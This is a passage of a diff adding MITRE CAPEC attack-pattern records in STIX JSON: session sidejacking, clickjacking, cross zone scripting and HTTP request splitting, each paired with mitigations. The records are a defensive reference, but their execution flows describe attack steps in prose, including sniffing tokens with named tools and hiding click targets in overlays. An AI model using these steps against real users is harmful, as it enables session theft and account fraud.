"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c9bb040-3574-49f1-bec3-723afe52faa1", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8dc4376f-e920-42a2-9578-575c37c7c146", + "spec_version": "2.1", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead", + "id": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-101-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c92c5203-00ee-424c-a58b-d36d36695f03", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c52aed3b-1355-42cd-a2a4-3c570d0f5c35", + "spec_version": "2.1", + "target_ref": "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.", + "external_references": [ + { + "external_id": "CAPEC-102", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/102.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-523", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/523.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-614", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/614.html" + } + ], + "id": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Session Sidejacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, they has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but their e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Unprotected Session Token Transfer: The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens.

    2. Techniques
    The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies their knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

Experiment

  1. Capture session token: The attacker uses sniffing tools to capture a session token from traffic.

  2. Insert captured session token: The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker and the victim are both using the same WiFi network.", + "The victim has an active session with a target system.", + "The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)", + "The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically \"rings home\" asynchronously using the session token" + ], + "x_capec_resources_required": [ + "A packet sniffing tool, such as wireshark, can be used to capture session information." + ], + "x_capec_skills_required": { + "Low": "Easy to use tools exist to automate this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b42f764-6aa4-4c32-a752-c814178db08c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "spec_version": "2.1", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.", + "id": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66376c3d-cedd-4a2e-9fd6-1737edda9a5e", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2fe43b4-eb82-4bf6-b874-c2d9018c94fe", + "spec_version": "2.1", + "target_ref": "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tricks a victim into unknowingly initiating some action in one system while interacting with the UI from a seemingly completely different, usually an adversary controlled or intended, system.", + "external_references": [ + { + "external_id": "CAPEC-103", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/103.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Clickjacking", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Clickjacking" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-619", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.html" + } + ], + "id": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Clickjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "\n A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which they subscribe with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens.\n In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an adversary's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Craft a clickjacking page: The adversary utilizes web page layering techniques to try to craft a malicious clickjacking page

    2. Techniques
    The adversary leveraged iframe overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Flash file overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged Silverlight overlay capabilities to craft a malicious clickjacking page
    The adversary leveraged cross-frame scripting to craft a malicious clickjacking page

Exploit

  1. Adversary lures victim to clickjacking page: Adversary utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas.

    2. Techniques
    Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site.
    Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim.
    Lure the victim to the malicious site through a cross-site scripting attack.

  2. Trick victim into interacting with the clickjacking page in the desired manner: The adversary tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege.

    3. Techniques
    Hide action controls over very commonly used functionality.
    Hide action controls over very psychologically tempting content.
", + "x_capec_extended_description": "\n While being logged in to some target system, the victim visits the adversary's malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the adversary wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the adversary may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks they are clicking on versus what they are actually clicking on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "attack-pattern--b9593e93-5589-4ae9-b0e7-09fa5c3136e5", + "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408" + ], + "x_capec_prerequisites": [ + "The victim is communicating with the target application via a web based UI and not a thick client", + "The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS.", + "The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser)", + "The victim has an active session with the target system.", + "The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "Crafting the proper malicious site and luring the victim to this site are not trivial tasks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames.", + "id": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9b7917-b0c4-4461-93c3-7c9623a1eca8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--80867248-4826-45e5-84e9-99e4d1bc07c4", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Turn off JavaScript, Flash and disable CSS.", + "id": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c711dc9-c190-43bc-a5e0-02855f1b48e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7b45eac-7a77-4462-81b6-3ae5d81528e1", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--591f6f0b-24c7-4594-9450-5a3ca2a41ad7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.", + "external_references": [ + { + "external_id": "CAPEC-104", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/104.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-638", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/638.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Zone Scripting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the \"add video to chat\" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \"Add video to chat\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find systems susceptible to the attack: Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.

    2. Techniques
    Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place.

Experiment

  1. Find the insertion point for the payload: The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone.

    2. Techniques
    Finding weaknesses in functionality used by both privileged and unprivileged users.

Exploit

  1. Craft and inject the payload: Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.

    2. Techniques
    The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.
    Leverage cross-site scripting vulnerability to inject payload.
", + "x_capec_extended_description": "\n In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \"Restful Privilege Escalation\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must be using a zone-aware browser." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable script execution.", + "id": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d53f8236-31b6-44ef-9829-434ecc01751b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d62b228-ecb8-4238-bc64-ef63f9d03bd5", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone", + "id": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a5924dc-2691-401b-b498-a96e19330e3f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec174eec-0e8f-4c98-bfba-3ea29348c294", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone", + "id": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ddbbaa85-70d2-430f-b63f-f76eff819192", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ebaa0190-21bc-40aa-835b-534ee9459aba", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum", + "id": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa57cebd-a942-48ea-8782-ade74acdbddb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--abf207ec-5477-490e-a258-3be7ce5376f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper HTML output encoding before writing user supplied data to the page", + "id": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-104-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a223d161-4991-4c87-8118-ea0ee66f9f31", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d46c76e7-68c6-4e46-a3a2-d7dd40b98d75", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf5cbfb-36d8-4983-9267-9d17bff3817f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to split a single HTTP request into multiple unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-105", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/105.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Request Splitting", + "external_id": "24", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Request-Splitting" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Request Splitting, 2011, The Web Application Security Consortium", + "external_id": "REF-679", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246929/HTTP%20Request%20Splitting" + } + ], + "id": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Request Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + 